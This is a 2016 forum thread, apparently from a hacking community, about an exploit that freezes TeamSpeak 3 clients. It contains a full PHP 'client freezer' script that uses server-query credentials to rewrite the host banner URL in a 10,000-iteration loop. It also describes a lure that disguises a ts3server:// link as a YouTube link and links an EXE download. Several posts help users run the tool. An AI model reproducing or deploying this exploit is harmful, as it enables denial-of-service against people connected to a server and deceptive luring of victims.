TeamSpeak 3 Client <= 3.0.19.1 Freeze 2017-06-20

Derp · May 2, 2016

Capol said:
no one will click the link bro still not good crash

You shouldn't be using this on other people though!

CreeperTheKing · May 2, 2016

Theres a client crash for 3.0.19.1, or just this one? This one is a server crash technically.

Derp · May 2, 2016

Nope! this is a Client Freeze! That is triggered by a specially crafted server

jdog31804 · May 2, 2016

can u make a custom query port one thanks

great tool though

Laszl0w · May 2, 2016

I think he wont even make custom query port this exploit if you read it :

This is for educational and informational purposes only. Use this information responsibly.

Derp already told to us how this exploit working,make one for yourself.

Like that.

CreeperTheKing · May 2, 2016

My question is, where can u get the server password?

Asphyxia · May 2, 2016

Laszl0w said:
I think he wont even make custom query port this exploit if you read it :

This is for educational and informational purposes only. Use this information responsibly.

Derp already told to us how this exploit working,make one for yourself.
Like that.

If you want to release your PHP source that is fine with me.
You don't have to though if you do not want it public. :zcool:

Laszl0w · May 2, 2016

I didn't want to release it,i just want to tell everyone its possible to make it in PHP.
And i didnt got access from you to release it to public. Asphyxia

AndyDE · May 2, 2016

CreeperTheKing said:
My question is, where can u get the server password?

Let me know too ^^

Alligatoras · May 2, 2016

CreeperTheKing said:
My question is, where can u get the server password?

AndyDE said:
Let me know too ^^

Where it says the Server Admin Password he means the Query password for the Admin Server Query Account.
This password was given to you when you created you teamspeak 3 server in the console (Linux Users) or in a Teamspeak window (Windows Users) (only if you did create the server).
If you have you teamspeak 3 server from an Authorized Hoster then you don't have the Actual Server Query Account login information.
As Server Admin of you teamspeak 3 server you are able to create your own one throught teamspeak.

On the Teamspeak Cilent just go at the top:
1) Tools
2) Server Query Login
3) Set a desired name for admin server query name in the box and then Click Ok
4) You will get your password. Make sure to save it somewhere because it won't show up again.

Then you can use these info in this programm (or any query program you want).
Remember that this query account will have the same persmissions with your teamspeak uid and not the actuall Server Query Account.

Wish that helped you guys!

Laszl0w · May 3, 2016

Just make a code which put a random number to 1 to 10000 after the picture link.

AndyDE · May 3, 2016

Alligatoras said:
Where it says the Server Admin Password he means the Query password for the Admin Server Query Account.
This password was given to you when you created you teamspeak 3 server in the console (Linux Users) or in a Teamspeak window (Windows Users) (only if you did create the server).
If you have you teamspeak 3 server from an Authorized Hoster then you don't have the Actual Server Query Account login information.
As Server Admin of you teamspeak 3 server you are able to create your own one throught teamspeak.

On the Teamspeak Cilent just go at the top:
1) Tools
2) Server Query Login
3) Set a desired name for admin server query name in the box and then Click Ok
4) You will get your password. Make sure to save it somewhere because it won't show up again.

Then you can use these info in this programm (or any query program you want).
Remember that this query account will have the same persmissions with your teamspeak uid and not the actuall Server Query Account.

Wish that helped you guys!

Okey thanks it allows also on my Server to freeze clients no any other?

dedmen · May 3, 2016

AndyDE said:
Okey thanks it allows also on my Server to freeze clients no any other?

It freezes all Clients currently connected to your Server.

AndyDE · May 3, 2016

Okey Thank you

Laszl0w · May 3, 2016

Code:

<!DOCTYPE html>
<html>
<body>
<style>
table, th, td {
    border: 1px solid black;
}
</style>
<title>R4P3 Client Freezer</title>
<center>
<iframe width="0" height="0" src="http://www.youtube.com/embed/
UA92MsDrrOI?autoplay=1" frameborder="0"
allowfullscreen></iframe>
<b>R4P3 Client Freezer</b>
<form method="POST">
<div><br>
    <label for="IP">Server IP</label><br>
    <input type="text" id="IP" name="IP"><br>
    <label for="name">ServerAdmin UserName</label><br>
    <input type="text" id="name" name="name"><br>
    <label for="pass">ServerAdmin Password</label><br>
    <input type="text" id="pass" name="pass"><br>
    <label for="port">Query Port</label><br>
    <input type="text" id="port" name="port"><br>
    <input type="submit" value="Freeze" name = "button"><br><br>
<b>This is for educational and informational purposes only. Use this information responsibly.<br>
<b>R4P3.NET @ 2016<br><br>
    Credits :<br><br>
    <table>
  <tr>
    <th>Name</th>
    <th>Job</th>
  </tr>
  <tr>
    <td>Asphyxia</td>
    <td>Found the vulnerability</td>
  </tr>
  <tr>
    <td>Laszl0w</td>
    <td>Remaked in PHP</td>
  </tr>
</table>

</body>
</html>
<?php
set_time_limit(0);
require_once("libraries/TeamSpeak3/TeamSpeak3.php");
if(isset($_POST['button']))
  {
  $sIP= $_POST["IP"];
  $sName = $_POST["name"];
  $sPassword = $_POST["pass"];
  $sPort = $_POST["port"];
  $ts3_ServerInstance = TeamSpeak3::factory("serverquery://".$sName.":".$sPassword."@".$sIP.":".$sPort."/");
foreach($ts3_ServerInstance as $ts3_VirtualServer)
{
 for ($x = 0; $x <= 10000; $x++) 
 {
 $ts3_VirtualServer->virtualserver_hostbanner_gfx_url = "http://hungarycs.hu/wp-content/uploads/2016/01/webo2016.jpg?$x";
 $ts3_VirtualServer->modify(array("virtualserver_hostbutton_gfx_url" => "http://hungarycs.hu/wp-content/uploads/2016/01/webo2016.jpg?$x"));
 }
}

}
?>

Credits to Asphyxia & Me

AstoNat · May 6, 2016

Asphyxia said:
The download link is right here, for registered users only. Registering is free, so register if interested:

https://mega.nz/#!J1ITyKwC!LF3KCTEJu54PnDmrAxMrv2DXVOwEAKDfJQ3ZO5hzz4I

Here is a video demonstration:

All that you need:

The EXE file downloaded from above.

Access to a server with TCP port 10011 open.

The serveradmin username (default: serveradmin) and password.

Then just do something like:

Code:

[url=ts3server://127.0.0.1]https://www.youtube.com/watch?v=-qFeUHEiPiM[/url]

Theoretically, an individual will see the YouTube link and click it. Then their TeamSpeak 3 client will freeze.

This is for educational and informational purposes only. Use this information responsibly.

Hello, Im login in but its not working. Iam doing smth wrong?

AstoNat · May 6, 2016

Thx for the Script, but what i need to do? By me it looks like this:
http://i.epvpimg.com/wFkgg.png

Laszl0w · May 6, 2016

Did u added TeamSpeak3 PHP APi?

AstoNat · May 6, 2016

Laszl0w said:
Did u added TeamSpeak3 PHP APi?

How i install? Cant find any infos

Alligatoras · May 6, 2016

AstoNat said:
How i install? Cant find any infos

http://addons.teamspeak.com/directory/tools/integration/TeamSpeak-3-PHP-Framework.html
That is the link to download the TS3 PHP Api. You don't install this thing. YOu just need to set it in the same folder with the php code you have and you want to use!!

If you have any further questions you are more that welcome to request it. Asking for something you don't know...will help you expand your knowldge!!!

TeamSpeak 3 Client <= 3.0.19.1 Freeze 2017-06-20

Derp

CreeperTheKing

Member

Derp

jdog31804

Member

Laszl0w

Well-Known Member

CreeperTheKing

Member

Asphyxia

Owner

Laszl0w

Well-Known Member

AndyDE

Member

Alligatoras

Laszl0w

Well-Known Member

AndyDE

Member

dedmen

AndyDE

Member

Laszl0w

Well-Known Member

AstoNat

Member

AstoNat

Member

Laszl0w

Well-Known Member

AstoNat

Member

Alligatoras